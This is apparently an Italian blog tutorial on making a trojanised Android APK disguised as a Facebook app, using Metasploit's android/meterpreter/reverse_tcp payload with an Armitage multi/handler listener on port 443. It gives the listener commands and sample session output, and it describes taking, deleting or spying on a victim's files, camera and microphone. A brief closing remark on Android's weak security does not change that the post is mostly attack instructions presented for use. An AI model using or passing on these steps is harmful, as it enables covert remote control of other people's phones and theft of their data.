il Payload si chiama android/meterpreter/reverse_tcp, e cosa fa, voi vi chiederete?
Crea una reverse connection tra Android(comunque è un vero e proprio trojan) e il nostro PC, quindi noi, cosa potremmo fare? La risposta è semplice, possiamo accedere alla shell(o riga di comando) android
possiamo usare comandi come cd /storage/sdcard per accedere alla Memoria interna del telefono e scaricare tutti i files della vittima o eventualmente eliminarli, con sysinfo possiamo avere tutte le info sul Dispositivo, il Kernel e il linguaggio (java/java), il nome ( di solito @localhost), scattare foto con la webcam, registrare sia con microfono e fotocamera... insomma non poche cose, tra l'altro rischiose come nel primo caso
Prima fase:
Creazione dell'APK Malevolo, al suo interno il PAYLOAD android/meterpreter/reverse_tcp cercando di farlo sembrare il piu' possibile il contrario
quindi apriamo una shell linux e digitiamo quanto segue nell'immagine
per LHOST dovete digitare su un'altra console ifconfig e vedere il vostro IP LOCALE
per LPORT mettete 443
poi, una volta ottenuto il file facebook_4.0.apk (sul desktop) trasferiamolo sul NOSTRO telefono
io uso airdroid :)
Installiamo l'APK da dove l'abbiamo trasferito nel mio caso /extSdCard
ci apparira' non Facebook ma un'app chiamata MainActivity
comunque...
ora apriamo armitage da shell con i comandi che vedete in foto:
quindi otteremo un Programma chiamato Armitage, diviso in Shell Metasploit (in basso) e Interfaccia Grafica
(in Alto)
Ora andiamo a settare il cosiddetto Listener che consentira il rilevamento e l'intrusione nel Sistema Android
impostate come scritto in foto, ma in LHOST mettete il vostro IP LOCALE e LPORT mettete 443
**ATTENZIONE: DOVETE COPIARE QUELLO CHE È SCRITTO VICINO A HANDLER IN ROSSO E PER PRIMO SCRIVETE: use exploit/multi/handler**
ora abbiamo impostato il Listener siamo pronti, installiamo e avviamo l'app sul telefono...
dopo pochi secondi dovrebbe apparire sul PC questo come in foto
Se viene rilevato appare sulla shell
(*)Sending stage (xxxxx bytes) to IP DEL TELEFONO
(*)Meterpreter Session 1 Opened
meterpreter>
proviamo ad eseguire un comando come sysinfo... premendo help ne escono a bizzeffe e potete provarli tutti
Questo ci deve far pensare a quanto Android non sia sicuro, è inconcepibile che un malware del genere non venga riconosciuto dallo scanner Google o altri antivirus e puo' bypassare le sicurezze senza problemi...
spero vi sia piaciuta... ciao a tutti!
Nessun commento:
Posta un commento